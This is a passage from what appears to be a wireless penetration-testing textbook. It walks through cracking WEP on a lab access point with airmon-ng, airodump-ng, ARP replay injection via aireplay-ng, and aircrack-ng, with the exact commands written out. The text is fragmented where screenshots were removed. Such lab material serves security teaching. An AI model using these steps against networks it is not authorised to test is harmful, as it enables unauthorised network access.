Follow the given instructions to get started:
Wlan0
by issuing the command ifconfig wlan0 up
. Then we will run airmon-ng start wlan0
to create mon0
, the monitor mode interface, as shown in the following screenshot. Verify the mon0
interface has been created using iwconfig
command: airodump-ng
to locate our lab access point using the command airodump-ng mon0
. As you can see in the following screenshot, we are able to see the Wireless Lab
access point running WEP: Wireless Lab
, so let us enter airodump-ng bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0
to only see packets for this network. Additionally, we will request airodump-ng
to save the packets into a pcap
file using the --write
directive: abcdefabcdefabcdefabcdef12
. Once the client has successfully connected, airodump-ng
should report it on the screen: ls
in the same directory, you will be able to see files prefixed with WEPCrackingDemo-*
as shown in the following screenshot. These are traffic-dump files created by airodump-ng:
airodump-ng
screen, the number of data packets listed under the #Data
column is very few in number (only 68). In WEP cracking, we need a large number of data packets, encrypted with the same key to exploit weaknesses in the protocol. So, we will have to force the network to produce more data packets. To do this, we will use the aireplay-ng
tool: aireplay-ng
and inject them back into the network, to simulate ARP responses. We will be starting aireplay-ng
in a separate window, as shown in the next screenshot. Replaying these packets a few thousand times, we will generate a lot of data traffic on the network. Even though aireplay-ng
does not know the WEP key, it is able to identify the ARP packets by looking at the size of the packets. ARP is a fixed header protocol and thus the size of the ARP packet can be easily determined and can be used for identifying them even within encrypted traffic. We will run aireplay-ng
with the options that are discussed next. The -3
option is for ARP replay, -b
specifies the BSSID of our network, and -h
specifies the client MAC address that we are spoofing. We need to do this, as replay attack will only work for authenticated and associated client MAC addresses. aireplay-ng
was able to sniff ARP packets and has started replaying them into the network: airodump-ng
will also start registering a lot of data packets. All these sniffed packets are being stored in the WEPCrackingDemo-*
files that we saw previously: aircrack-ng
with the options WEPCRackingDemo-01.cap
in a new window. This will start the aircrack-ng
software and it will begin working on cracking the WEP key using the data packets in the file. Note that it is a good idea to have airodump-ng—collecting
the WEP packets, aireplay-ng—doing
the replay attack, and Aircrack-ng—attempting
to crack the WEP key based on the captured packets, all at the same time. In this experiment, all of them are open in separate windows: aircrack-ng
is working on the packets to crack the WEP key: aireplay-ng)
, this should take 5-10 minutes at most. If the number of data packets currently in the file are not sufficient, then aircrack-ng
will pause as shown in the following screenshot and wait for more packets to be captured, and will then restart the cracking process again: Aircrack-ng
should be able to break the key. Once it does, it proudly displays it in the terminal and exits as shown in the following screenshot: Aircrack-ng
. The only requirement is that a great enough number of data packets, encrypted with this key, need to be made available to Aircrack-ng
.We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng
tool to replay ARP packets into the network. This caused the network to send ARP replay packets, thus greatly increasing the number of data packets sent over the air. We then used aircrack-ng
to crack the WEP key by analyzing cryptographic weaknesses in these data packets.
Note that, we can also fake an authentication to the access point using the Shared Key Authentication bypass technique, we learnt in the last chapter. This can come in handy, if the legitimate client leaves the network. This will ensure we can spoof an authentication and association and continue to send our replayed packets into the network.
In the previous exercise, if the legitimate client had suddenly logged off the network, we would not be able to replay the packets as the access point will not accept packets from un-associated clients.
Your challenge would be to fake an authentication and association using the Shared Key Authentication bypass we learnt in the last chapter, while WEP cracking is going on. Log off the legitimate client from the network and verify if you are still able to inject packets into the network and if the access point accepts and responds to them.
18.119.104.238